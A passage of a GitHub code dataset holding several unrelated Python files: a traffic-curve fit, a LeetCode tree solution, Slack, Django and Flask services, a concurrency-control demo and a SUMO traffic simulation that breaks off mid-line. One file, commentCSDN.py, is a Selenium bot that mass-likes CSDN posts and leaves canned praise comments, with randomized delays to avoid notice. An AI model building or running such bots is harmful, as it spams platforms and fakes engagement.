\"/Users/alexeydemyanchuk/Machine_Learning/BuildingMachineLearningSystemsWithPython/\"\n\n# function to find approx error\ndef error(f, x, y):\n return sp.sum((f(x)-y)**2)\n\n# data x: hours; y: hits per hour\ndata = sp.genfromtxt(PATH+\"ch01/data/web_traffic.tsv\", delimiter=\"\\t\")\n# create vectors from data\nx = data[:,0]\ny = data[:,1]\n# cleaning data from NaN\nx = x[~sp.isnan(y)]\ny = y[~sp.isnan(y)]\n\ninflection = int(3.5*7*24) # calculate the inflection point in hours\nxa = x[:inflection] # data before the inflection point\nya = y[:inflection]\nxb = x[inflection:] # data after\nyb = y[inflection:]\n\nfa = sp.poly1d(sp.polyfit(xa, ya, 1))\nfb = sp.poly1d(sp.polyfit(xb, yb, 1))\nfa_error = error(fa, xa, ya)\nfb_error = error(fb, xb, yb)\nprint(\"Error inflection=%f\" % (fa_error + fb_error))\n\n# plot the (x,y) points with dots of size 10\nplt.scatter(x, y, s=10)\nplt.title(\"Web traffic over the last month\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"Hits/hour\")\n\nplt.xticks([w*7*24 for w in range(10)],\n ['week %i' % w for w in range(10)])\nplt.autoscale(tight=True)\n# draw a slightly opaque, dashed grid\nplt.grid(True, linestyle='-', color='0.75')\n\n\n\n# add model to plot\nfx = sp.linspace(0,x[-1], 1000) # generate X-values for plotting\nplt.plot(fx, fa(fx), linewidth=4)\nplt.plot(fx, fb(fx),color='blue', linestyle=\"-.\",linewidth=4)\nplt.legend([\"d=%i\" % fa.order,\"d=%i\" % fb.order], loc=\"upper left\")\n\n\nplt.show()\n","repo_name":"ademyanchuk/BuildingMachineLearning","sub_path":"ch01/inflection.py","file_name":"inflection.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72229186153","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time :2021/7/26 12:58\n# @Author :DKJ\n# @File :comment.py\n# @Software :PyCharm\n\n\nfrom requests import RequestException\n\ndef get_page(url,headers,proxy=None):\n try:\n response = requests.get(url, headers=headers,proxies=proxy)\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n print('请求出错')\n return None\n\ndef get_blog_url_list(url ,headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60'}):\n page_text = requests.get(url=url,headers=headers).text\n # print(page_text)\n tree = etree.HTML(page_text)\n li_list = tree.xpath('//a/@href')\n # print(li_list)\n # print(li_list)\n url_list = []\n for old_url in li_list:\n if 'article' in old_url and 'category' not in old_url and url.split('/')[-1] in old_url:\n url_list.append(old_url)\n return url_list\n#\n# def parse_page(url):\n# text = requests.get(url)\n# print(text)\n#\n# # def comment(url,headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60'}):\n#\n#\n#\n# url_list = get_url_list(url)\n# print(len(url_list))\n# for url in url_list:\n# print(url)\nfrom selenium import webdriver\nfrom lxml import etree\nimport time\nfrom selenium.webdriver.chrome.options import Options\nimport requests\nfrom json import loads\nimport random\nheaders = {\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\",\n \"Host\": \"blog.csdn.net\"\n }\ndef write_commented_url(url,path = 'commented_url.txt'):\n f = open(path,'a+')\n f.write(url+'\\n')\n f.close()\ndef get_commented_url(path = 'commented_url.txt'):\n commented_url = [] # 已经评论的文章,最好不要二次评论\n f = open(path,'r')\n url_list = f.readlines()\n print(url_list)\n for url in url_list:\n url = url.replace('\\n','')\n commented_url.append(url)\n f.close()\n return commented_url\ndef get_url1(start_page = 0,end_page = 50):\n params = {\n \"page\": str(start_page),\n # 可以修改pageSize的值\n \"pageSize\": str(end_page),\n # \"child_channel\":\n }\n # topics = [\"c/c++\",\"java\",\"javascript\",\"php\",\"python\",\"人工智能\",\"区块链\",\n # \"大数据\",\"移动开发\",\"嵌入式\",\"开发工具\",\"数据结构与算法\",\"测试\",\"游戏\",\"网络\",\"运维\"]\n topics = [\"c/c++\",\"python\",\"人工智能\",\"大数据\",\"数据结构与算法\",\"区块链\",\"javascript\",\"开发工具\"]\n topics = [\"c/c++\", \"python\", \"人工智能\", \"大数据\"]\n # params[\"child_channel\"] = random.choice(topics)\n # print(params)\n url_set = set('')\n all_url = \"https://blog.csdn.net/phoenix/web/blog/hotRank/\" # 领域内容榜\n for topic in topics:\n params[\"child_channel\"] = topic\n # print(params)\n r = requests.get(all_url, headers=headers, params=params)\n # print(r.text)\n # print(loads(r.text))\n datas = loads(r.text)[\"data\"]\n # print(datas)\n\n print(\"---------- 这次领域内容榜的主题是\" + params['child_channel']+\"----------\")\n\n for data in datas:\n url = data[\"articleDetailUrl\"]\n # print(data[\"nickName\"],\n # data[\"articleTitle\"],\n # url,\n # \"热度为\" + data[\"pcHotRankScore\"]\n # )\n # url_list.append(url)\n url_set.add(url)\n print(\"---------- 领域内容榜的主题\" + params['child_channel'] + \"爬取完毕----------\")\n print(\"\\n\\n\")\n return url_set\ndef get_url2(start_page = 0,end_page = 50):\n params = {\n \"page\": str(start_page),\n # 可以修改pageSize的值\n \"pageSize\": str(end_page),\n }\n url_set = set('')\n all_url = \"https://blog.csdn.net/phoenix/web/blog/hotRank/\" # 领域内容榜\n r = requests.get(all_url, headers=headers, params=params)\n datas = loads(r.text)[\"data\"]\n\n print(\"---------- 正在爬取全站综合热榜 ----------\")\n for data in datas:\n url = data[\"articleDetailUrl\"]\n url_set.add(url)\n print(\"---------- 全站综合热榜爬取完毕 ----------\")\n print(\"\\n\\n\")\n return url_set\ndef comment_blog(comments,url_set,commented_url,total = 0, end = 100):\n chrome_options = Options()\n chrome_options.add_experimental_option(\"debuggerAddress\", \"127.0.0.1:9999\")\n driver = webdriver.Chrome(options=chrome_options,executable_path='C:/bin/chromedriver.exe')\n # driver.get(\"https://www.baidu.com/\")\n print(driver.title)\n for url in url_set:\n if url not in commented_url:\n comment = random.choice(comments)\n driver.get(url)\n try:\n driver.find_element_by_id('is-like-imgactive').click() # 点赞\n except:\n driver.find_element_by_id('is-like-img').click()\n driver.find_element_by_id('comment_content').clear() # 找到评论框\n driver.find_element_by_id('comment_content').send_keys(comment) # 加载评论\n time.sleep(3)\n try:\n driver.find_element_by_css_selector(\"[class='btn btn-sm btn-comment']\").click() # 点击评论\n except:\n driver.find_element_by_css_selector(\"[class='bt-comment-show']\").click()\n finally:\n print(url + ' 已经评论和点赞','评论的内容是: ' + comment)\n write_commented_url(url)\n total += 1\n if total % 10 == 0:\n print('已经评论了 {} 篇文章'.format(total))\n if total == end:\n print('今天评论上限,请试后再确定是否继续评论')\n break\n if total % 20 == 0:\n time.sleep(1800)\n elif total % 50 == 0:\n time.sleep(2700)\n else:\n using_time = random.randint(120,360)\n time.sleep(using_time)\n # time.sleep(5)\n driver.quit()\n\n\ndef main():\n # url = 'https://blog.csdn.net/KIK9973'\n # blog_url = get_blog_url_list(url)\n # print(blog_url)\n # url_set = set(blog_url)\n url_set1 = get_url1(start_page= 0,end_page= 30)\n url_set2 = get_url2(start_page = 0,end_page = 30)\n url_set = ('')\n url_set = url_set1 | url_set2\n print(\"这次爬取到的评论的网站个数为\",len(url_set))\n commented_url = get_commented_url()\n # return\n comments = ['好文,受益匪浅,点赞支持,欢迎回访!',\n '太精辟了啊,竖起我的大拇指!希望互相关注一波!',\n '点赞博主文章,大佬牛批,写的很详细,欢迎回访',\n '内容详细,结构清晰,学到了,欢迎回访哦!',\n '学习佳作,顺手点赞与关住,期待大佬回访!',\n '不错的文章,受益匪浅,欢迎回访',\n '写的好,很nice,期待大佬回访!',\n '支持大佬,原创不易,欢迎回访',\n '期待你更多好的作品,加油哦',\n '太精辟了啊,竖起我的大拇指!希望互相关注一波!',\n '好文,支持大佬,期待大佬也来指点一下我的博文。',\n '好文,已收藏,大佬分析的很到位,明白了很多,大赞!( ̄ˇ ̄),大佬有兴趣也可以看下我的博客哈',\n '博主写的非常清晰啊,对我很有帮助,谢谢啦,我也写了一些,欢迎回访',\n '膜拜大佬的技术,来我博客指点江山吧!',\n '写的真清晰,学到了,我也有一些好文章,欢迎回访',\n '给大佬递茶祝上热榜 以三连 望回访',\n ]\n\n comment_blog(comments,url_set,commented_url,0,100)\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Kedreamix/fun_spider","sub_path":"CSDN/commentCSDN.py","file_name":"commentCSDN.py","file_ext":"py","file_size_in_byte":8113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73725442794","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def __init__(self):\n self.flag=True\n def isBalanced(self, root: Optional[TreeNode]) -> bool:\n if root:\n self.dfs(root)\n return self.flag\n\n def dfs(self,root):\n if not root:\n return 0\n if not self.flag:\n return 0\n right=self.dfs(root.right)\n left=self.dfs(root.left)\n if (abs(right-left)>1):\n self.flag=False\n return 1+max(right,left)","repo_name":"haydentinker/LeetCode","sub_path":"0110-balanced-binary-tree/0110-balanced-binary-tree.py","file_name":"0110-balanced-binary-tree.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74916423592","text":"import os\n\nfrom devdeck_core.decks.deck_controller import DeckController\nfrom slack_sdk import WebClient\n\nfrom devdeck_slack.slack_away_control import SlackAwayControl\nfrom devdeck_slack.slack_dnd_control import SlackDndControl\nfrom devdeck_slack.slack_online_control import SlackOnlineControl\nfrom devdeck_slack.slack_status_control import SlackStatusControl\n\n\nclass SlackDeck(DeckController):\n def __init__(self, key_no, **kwargs):\n self.actions = {\n 'online': SlackOnlineControl,\n 'away': SlackAwayControl,\n 'status': SlackStatusControl,\n 'dnd': SlackDndControl\n }\n super().__init__(key_no, **kwargs)\n\n def initialize(self):\n with self.deck_context() as context:\n with context.renderer() as r:\n r.image(os.path.join(os.path.join(os.path.dirname(__file__), \"assets\", 'slack.png'))).end()\n\n def deck_controls(self):\n api_client = WebClient(token=self.settings['api_key'])\n\n for action_setting in self.settings['actions']:\n action_control_class = self.actions[action_setting['action']]\n\n control_settings = dict(action_setting)\n del control_settings['action']\n del control_settings['key']\n self.register_control(action_setting['key'], action_control_class, api_client=api_client, **control_settings)\n\n def settings_schema(self):\n return {\n 'api_key': {\n 'type': 'string',\n 'required': True,\n },\n 'actions': {\n 'type': 'list',\n 'required': True,\n 'schema': {\n 'type': 'dict',\n 'schema': {\n 'action': {\n 'type': 'string',\n 'required': True\n },\n 'key': {\n 'type': 'integer',\n 'required': True\n },\n 'text': {\n 'type': 'string',\n 'required': False\n },\n 'emoji': {\n 'type': 'string',\n 'required': False\n },\n 'emoji_slack': {\n 'type': 'string',\n 'required': False\n },\n 'dnd': {\n 'type': 'boolean',\n 'required': False,\n 'excludes': 'clear_dnd'\n },\n 'clear_dnd': {\n 'type': 'boolean',\n 'required': False,\n 'excludes': 'dnd'\n },\n 'duration': {\n 'type': 'integer',\n 'min': 1,\n 'required': False,\n 'excludes': 'until',\n },\n 'until': {\n 'type': 'string',\n 'required': False,\n 'excludes': 'duration'\n }\n }\n }\n },\n }\n","repo_name":"jamesridgway/devdeck-slack","sub_path":"devdeck_slack/slack_deck.py","file_name":"slack_deck.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"72"} +{"seq_id":"266276843","text":"from api_base.services import BaseService\nfrom api_user.constants import Roles\nfrom api_user.models import Account, User\n\n\nclass AccountService(BaseService):\n @classmethod\n def login_with_google(cls, account_obj, profile_obj):\n created_account = Account.objects.filter(email=account_obj['email'])\n if not created_account:\n account = Account.objects.create(**account_obj)\n profile_obj.update({\n 'account_id': account.id,\n 'role': Roles.USER.value,\n })\n return User.objects.create(**profile_obj)\n else:\n created_account.update(google_login=True)\n return User.objects.get_or_create(**profile_obj)[0]\n\n @classmethod\n def create_user(cls, validated_data):\n account = dict({\n 'password': validated_data.pop('password'),\n 'email': validated_data.pop('email')\n })\n account = Account.objects.filter(email=account['email']).update(**account)\n validated_data.update({'account': account})\n return User.objects.get_or_create(**validated_data)[0]\n","repo_name":"huong10102001/DUTOnlineCourseSystem","sub_path":"src/backend/api_auth/services/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30309837750","text":"from flask import Blueprint, request, jsonify, make_response, current_app\nimport json\nfrom src import db\n\n\ndoctors = Blueprint('doctors', __name__)\n\n# Get all patients\n@doctors.route('/patients/', methods=['GET'])\ndef get_patients(var):\n cursor = db.get_db().cursor()\n cursor.execute(f'select * from Patient where PrimaryDoctor = {var}')\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n# Add a new patient in the dataset\n@doctors.route('/new_patient/', methods = ['POST'])\ndef add_patient(doc_id):\n current_app.logger.info(request.form)\n cursor = db.get_db().cursor()\n name = request.form['name']\n dob = request.form['dob']\n address = request.form['address']\n city = request.form['city']\n state = request.form['state']\n zip = request.form['zip']\n email = request.form['email']\n phone = request.form['phone']\n query = f'INSERT INTO Patient(Name, DOB, Address, City, State, ZipCode, Email, PhoneNumber, PrimaryDoctor) VALUES (\\\"{name}\\\", \\\"{dob}\\\", \\\"{address}\\\", \\\"{city}\\\", \\\"{state}\\\", \\\"{zip}\\\", \\\"{email}\\\", \\\"{phone}\\\", {doc_id})'\n cursor.execute(query)\n db.get_db().commit()\n return 'Success!'\n\n# Get the doctors name for the dropdown menu\n@doctors.route('get_doc_info', methods = ['GET'])\ndef get_doc_info():\n current_app.logger.info(request.form)\n cursor = db.get_db().cursor()\n cursor.execute('select Doctor_ID as value, Name as label from Doctor')\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n# Add a new prescription in the dataset\n@doctors.route('/new_prescription', methods = ['POST'])\ndef add_prescription():\n current_app.logger.info(request.form)\n cursor = db.get_db().cursor()\n Patient_ID = request.form['Patient_ID']\n NDC_Code = request.form['NDC_Code']\n RefillNumber = request.form['RefillNumber']\n query = f'INSERT INTO Prescription(Patient_ID, NDC_Code, RefillNumber) VALUES (\\\"{Patient_ID}\\\", \\\"{NDC_Code}\\\", \\\"{RefillNumber}\\\")'\n cursor.execute(query)\n db.get_db().commit()\n return 'Success!'","repo_name":"johnmccarthy23/UltraHealth","sub_path":"flask-app/src/doctors/doctors.py","file_name":"doctors.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29384924287","text":"# Import dependencies.\n\n# Import own module\nfrom database import *\nfrom transaction import *\nclass TransactionExecutor:\n \"\"\"\n Class that execute and validate OCC transaction in serial way.\n\n Attributes:\n \n \"\"\"\n def __init__(self, db:'SerialDatabase', transaction:Transaction) -> None:\n \"\"\"\n Constructor of the TransactionExecutor.\n\n Parameters:\n -----------\n db: SerialDatabase\n the local database\n transaction: Transaction\n The transaction to be executed.\n \"\"\"\n self.db = db\n self.transaction = transaction\n\n def readingPhase(self) -> None:\n \"\"\"\n Execute the reading phase of OCC transaction.\n \"\"\"\n # Read the database\n self.transaction.execute()\n \n def validationAndWritingPhase(self) -> bool:\n \"\"\"\n Execute the validation and writing phase of OCC transaction.\n \"\"\"\n last_commit_timestamp = self.db.last_commit_timestamp\n # Check for all the transactions that are commited after the current transaction start.\n for timestamp in range(self.transaction.start_timestamp+1, last_commit_timestamp + 1):\n # Get the transaction local database that is commited at that timestamp. \n if (self.db.transactions[timestamp] is not None):\n cached_db = self.db.transactions[timestamp].local_db\n # Validate with current transaction execution.\n # If conflict then rollback the transaction and return False.\n write_set = cached_db.write_set\n read_set = self.transaction.local_db.read_set\n if not write_set.isdisjoint(read_set):\n print(\"Conflict detected write set: \", write_set,\" read set: \", read_set, \n \"at timestamp \", timestamp, \"between transaction no-\",self.db.transactions[timestamp].number ,\n \" and transaction no-\", self.transaction.number )\n return False\n # If not conflict then commit the transaction and add to transaction manager.\n self.writingPhase()\n print(\"No conflict detected. Transaction\", self.transaction.number,\"commited.\")\n return True\n \n def writingPhase(self) -> None:\n \"\"\"\n Execute the writing phase of OCC transaction.\n \"\"\"\n self.transaction.local_db.commit()\n self.db.commitTransaction(self.transaction)\n\n\nclass SerialDatabase(Database):\n \"\"\"\n Class that manage OCC transaction execution.\n\n Attributes:\n -----------\n data: Database\n The database that is used for the transaction.\n transactions : Dict[int, Transaction]\n A dictionary that contains all the commited transactions that are currently in the transaction manager\n last_commit_timestamp : int\n The timestamp of the last commit.\n \"\"\"\n def __init__(self) -> None:\n \"\"\"\n Constructor of the SerialDatabase.\n \"\"\"\n super().__init__()\n self.transactions: Dict[int, Transaction] = {}\n self.last_commit_timestamp: int = 0\n \n def commitTransaction(self, transaction: Transaction) -> None:\n \"\"\"\n Commit a transaction.\n\n Parameters:\n -----------\n transaction: Transaction\n The transaction to be committed.\n \"\"\"\n self.last_commit_timestamp += 1\n if (self.last_commit_timestamp in self.transactions):\n raise Exception(\"There are a transaction commited at that timestamp\")\n self.transactions[self.last_commit_timestamp] = transaction\n transaction.local_db.commit()\n \n def begin(self, transaction: Transaction) -> TransactionExecutor:\n \"\"\"\n Begin a transaction.\n \n Parameters:\n -----------\n transaction: Transaction\n The transaction to be executed.\n \"\"\"\n return TransactionExecutor(self, transaction)\n\ndef main():\n occ = SerialDatabase()\n assert(occ.database == {})\n\n # Fill data/database with dummy value 0. \n t0_txn = fill_txn(['a','b','c'])\n t0 = occ.begin(Transaction(occ, t0_txn, 0, 0))\n t0.readingPhase()\n assert(t0.validationAndWritingPhase())\n assert(occ.database == {'a': 0, 'b': 0, 'c': 0})\n assert(occ.last_commit_timestamp == 1)\n\n # Read data using two concurrent transactions.\n # Must be not conflict.\n t1_txn = read_txn(['a','b','c'])\n t2_txn = read_txn(['a','b','c'])\n t1 = occ.begin(Transaction(occ, t1_txn, 1, 1))\n t2 = occ.begin(Transaction(occ, t2_txn, 2, 1))\n t1.readingPhase()\n t2.readingPhase()\n assert(t1.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 2)\n assert(t2.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 3)\n\n # Write data using two concurrent transactions.\n # Must be conflict.\n t3_txn = write_txn(['a','b','c'])\n t4_txn = write_txn(['a','b','c'])\n t3 = occ.begin(Transaction(occ, t3_txn, 3, 3))\n t4 = occ.begin(Transaction(occ, t4_txn, 4, 3))\n t3.readingPhase()\n t4.readingPhase()\n assert(t3.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 4)\n assert(not t4.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 4)\n\n # Disjoin write set of two concurrent transactions.\n # Must be not conflict.\n t5_txn = write_txn(['a','b'])\n t6_txn = write_txn(['c'])\n t5 = occ.begin(Transaction(occ, t5_txn, 5, 4))\n t6 = occ.begin(Transaction(occ, t6_txn, 6, 4))\n t5.readingPhase()\n t6.readingPhase()\n assert(t5.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 5)\n assert(t6.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 6)\n\n # Write data using two concurrent transactions.\n # Must be conflict.\n t7_txn = write_txn(['a','b', 'c'])\n t8_txn = write_txn(['a'])\n t7 = occ.begin(Transaction(occ, t7_txn, 7, 6))\n t8 = occ.begin(Transaction(occ, t8_txn, 8, 6))\n t7.readingPhase()\n t8.readingPhase()\n assert(t7.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 7)\n assert(not t8.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 7)\n\n # Write and read data using two concurrent transactions.\n # Must be conflict.\n t9_txn = write_txn(['a','b', 'c'])\n t10_txn = read_txn(['a'])\n t9 = occ.begin(Transaction(occ, t9_txn, 9, 7))\n t10 = occ.begin(Transaction(occ, t10_txn, 10, 7))\n t9.readingPhase()\n t10.readingPhase()\n assert(t9.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 8)\n assert(not t10.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 8)\n\n # Read and write data using two concurrent transactions.\n # Must be not conflict.\n t11_txn = read_txn(['a','b', 'c'])\n t12_txn = write_txn(['a','b', 'c'])\n t11 = occ.begin(Transaction(occ, t11_txn, 11, 8))\n t12 = occ.begin(Transaction(occ, t12_txn, 12, 8))\n t11.readingPhase()\n t12.readingPhase()\n assert(t11.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 9)\n assert(t12.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 10)\n\n # Disjoint write and read data using two concurrent transactions.\n # Must be not conflict.\n t13_txn = write_txn(['a'])\n t14_txn = read_txn(['b'])\n t13 = occ.begin(Transaction(occ, t13_txn, 13, 10))\n t14 = occ.begin(Transaction(occ, t14_txn, 14, 10))\n t13.readingPhase()\n t14.readingPhase()\n assert(t13.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 11)\n assert(t14.validationAndWritingPhase())\n assert(occ.last_commit_timestamp == 12)\n\nif __name__ == \"__main__\":\n main()","repo_name":"AndhikaRei/Serial-Optimistic-Concurrency-Control","sub_path":"occ.py","file_name":"occ.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18169090515","text":"# coding: utf-8\n\n# Python imports\nfrom datetime import timedelta\n\n# Django imports\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.models.aggregates import Count\nfrom django.utils import timezone\nfrom django.db.transaction import atomic\n\n# MAGE imports\nfrom scm.models import BackupSet\n\n\n@atomic\nclass Command(BaseCommand):\n args = ''\n help = 'Purges old archived backupsets from the database. Sets that were used for at least one restoration are left untouched.'\n\n def handle(self, *args, **options):\n if len(args) != 1:\n raise CommandError('no parameter specified')\n try:\n days = int(args[0])\n except:\n raise CommandError('parameter should be an integer')\n \n limit = timezone.now() - timedelta(days=days)\n init = BackupSet.objects.filter(removed__isnull=False).count()\n \n # do a loop - SQLite limitation that is only overcome in Django 1.8 - https://code.djangoproject.com/ticket/16426\n for bs in BackupSet.objects.filter(removed__isnull=False, set_date__lte=limit).annotate(installs=Count('installation')).filter(installs=0):\n bs.delete() \n \n print(\"%s backupsets purged\" %(init - BackupSet.objects.filter(removed__isnull=False).count()))\n","repo_name":"marcanpilami/MAGE","sub_path":"scm/management/commands/purgeoldbackups.py","file_name":"purgeoldbackups.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"23308811471","text":"import traci\nimport numpy as np\nimport random\nimport timeit\nimport os\n\n# phase codes based on environment.net.xml\nPHASE_NS_GREEN = 0 # action 0 code 00\nPHASE_NS_YELLOW = 1\nPHASE_NSL_GREEN = 2 # action 1 code 01\nPHASE_NSL_YELLOW = 3\nPHASE_EW_GREEN = 4 # action 2 code 10\nPHASE_EW_YELLOW = 5\nPHASE_EWL_GREEN = 6 # action 3 code 11\nPHASE_EWL_YELLOW = 7\n\n\nclass Simulation:\n def __init__(self, Model, TrafficGen, sumo_cmd, max_steps, green_duration, yellow_duration, num_states, num_actions):\n self._Model = Model\n self._TrafficGen = TrafficGen\n self._step = 0\n self._sumo_cmd = sumo_cmd\n self._max_steps = max_steps\n self._green_duration = green_duration\n self._yellow_duration = yellow_duration\n self._num_states = num_states\n self._num_actions = num_actions\n self._reward_episode = []\n self._queue_length_episode = []\n\n\n def run(self, episode):\n \"\"\"\n Runs the testing simulation\n \"\"\"\n start_time = timeit.default_timer()\n\n # first, generate the route file for this simulation and set up sumo\n self._TrafficGen.generate_routefile(seed=episode)\n traci.start(self._sumo_cmd)\n print(\"Simulating...\")\n\n # inits\n self._step = 0\n self._waiting_times = {}\n old_total_wait = 0\n old_action = -1 # dummy init\n\n while self._step < self._max_steps:\n\n # get current state of the intersection\n current_state = self._get_state()\n\n # calculate reward of previous action: (change in cumulative waiting time between actions)\n # waiting time = seconds waited by a car since the spawn in the environment, cumulated for every car in incoming lanes\n current_total_wait = self._collect_waiting_times()\n reward = old_total_wait - current_total_wait\n\n # choose the light phase to activate, based on the current state of the intersection\n action = self._choose_action(current_state)\n\n # if the chosen phase is different from the last phase, activate the yellow phase\n if self._step != 0 and old_action != action:\n self._set_yellow_phase(old_action)\n self._simulate(self._yellow_duration)\n\n # execute the phase selected before\n self._set_green_phase(action)\n self._simulate(self._green_duration)\n\n # saving variables for later & accumulate reward\n old_action = action\n old_total_wait = current_total_wait\n\n self._reward_episode.append(reward)\n\n #print(\"Total reward:\", np.sum(self._reward_episode))\n traci.close()\n simulation_time = round(timeit.default_timer() - start_time, 1)\n\n return simulation_time\n\n\n def _simulate(self, steps_todo):\n \"\"\"\n Proceed with the simulation in sumo\n \"\"\"\n if (self._step + steps_todo) >= self._max_steps: # do not do more steps than the maximum allowed number of steps\n steps_todo = self._max_steps - self._step\n\n while steps_todo > 0:\n traci.simulationStep() # simulate 1 step in sumo\n self._step += 1 # update the step counter\n steps_todo -= 1\n queue_length = self._get_queue_length() \n self._queue_length_episode.append(queue_length)\n\n\n def _collect_waiting_times(self):\n \"\"\"\n Retrieve the waiting time of every car in the incoming roads\n \"\"\"\n incoming_roads = [\"E2TL\", \"N2TL\", \"W2TL\", \"S2TL\"]\n car_list = traci.vehicle.getIDList()\n for car_id in car_list:\n wait_time = traci.vehicle.getAccumulatedWaitingTime(car_id)\n road_id = traci.vehicle.getRoadID(car_id) # get the road id where the car is located\n if road_id in incoming_roads: # consider only the waiting times of cars in incoming roads\n self._waiting_times[car_id] = wait_time\n else:\n if car_id in self._waiting_times: # a car that was tracked has cleared the intersection\n del self._waiting_times[car_id] \n total_waiting_time = sum(self._waiting_times.values())\n return total_waiting_time\n\n\n def _choose_action(self, state):\n \"\"\"\n Pick the best action known based on the current state of the env\n \"\"\"\n return np.argmax(self._Model.predict_one(state))\n\n\n def _set_yellow_phase(self, old_action):\n \"\"\"\n Activate the correct yellow light combination in sumo\n \"\"\"\n yellow_phase_code = old_action * 2 + 1 # obtain the yellow phase code, based on the old action (ref on environment.net.xml)\n traci.trafficlight.setPhase(\"TL\", yellow_phase_code)\n\n\n def _set_green_phase(self, action_number):\n \"\"\"\n Activate the correct green light combination in sumo\n \"\"\"\n\n\n if action_number == 0:\n traci.trafficlight.setPhase(\"TL\", PHASE_NS_GREEN)\n elif action_number == 1:\n traci.trafficlight.setPhase(\"TL\", PHASE_NSL_GREEN)\n elif action_number == 2:\n traci.trafficlight.setPhase(\"TL\", PHASE_EW_GREEN)\n elif action_number == 3:\n traci.trafficlight.setPhase(\"TL\", PHASE_EWL_GREEN)\n\n\n def _get_queue_length(self):\n \"\"\"\n Retrieve the number of cars with speed = 0 in every incoming lane\n \"\"\"\n halt_N = traci.edge.getLastStepHaltingNumber(\"N2TL\")\n halt_S = traci.edge.getLastStepHaltingNumber(\"S2TL\")\n halt_E = traci.edge.getLastStepHaltingNumber(\"E2TL\")\n halt_W = traci.edge.getLastStepHaltingNumber(\"W2TL\")\n queue_length = halt_N + halt_S + halt_E + halt_W\n return queue_length\n\n\n def _get_state(self):\n \"\"\"\n Retrieve the state of the intersection from sumo, in the form of cell occupancy\n \"\"\"\n state = np.zeros(self._num_states)\n car_list = traci.vehicle.getIDList()\n\n for car_id in car_list:\n lane_pos = traci.vehicle.getLanePosition(car_id)\n lane_id = traci.vehicle.getLaneID(car_id)\n lane_pos = 750 - lane_pos # inversion of lane pos, so if the car is close to the traffic light -> lane_pos = 0 --- 750 = max len of a road\n\n # distance in meters from the traffic light -> mapping into cells\n if lane_pos < 7:\n lane_cell = 0\n elif lane_pos < 14:\n lane_cell = 1\n elif lane_pos < 21:\n lane_cell = 2\n elif lane_pos < 28:\n lane_cell = 3\n elif lane_pos < 40:\n lane_cell = 4\n elif lane_pos < 60:\n lane_cell = 5\n elif lane_pos < 100:\n lane_cell = 6\n elif lane_pos < 160:\n lane_cell = 7\n elif lane_pos < 400:\n lane_cell = 8\n elif lane_pos <= 750:\n lane_cell = 9\n\n # finding the lane where the car is located \n # x2TL_3 are the \"turn left only\" lanes\n if lane_id == \"W2TL_0\" or lane_id == \"W2TL_1\" or lane_id == \"W2TL_2\":\n lane_group = 0\n elif lane_id == \"W2TL_3\":\n lane_group = 1\n elif lane_id == \"N2TL_0\" or lane_id == \"N2TL_1\" or lane_id == \"N2TL_2\":\n lane_group = 2\n elif lane_id == \"N2TL_3\":\n lane_group = 3\n elif lane_id == \"E2TL_0\" or lane_id == \"E2TL_1\" or lane_id == \"E2TL_2\":\n lane_group = 4\n elif lane_id == \"E2TL_3\":\n lane_group = 5\n elif lane_id == \"S2TL_0\" or lane_id == \"S2TL_1\" or lane_id == \"S2TL_2\":\n lane_group = 6\n elif lane_id == \"S2TL_3\":\n lane_group = 7\n else:\n lane_group = -1\n\n if lane_group >= 1 and 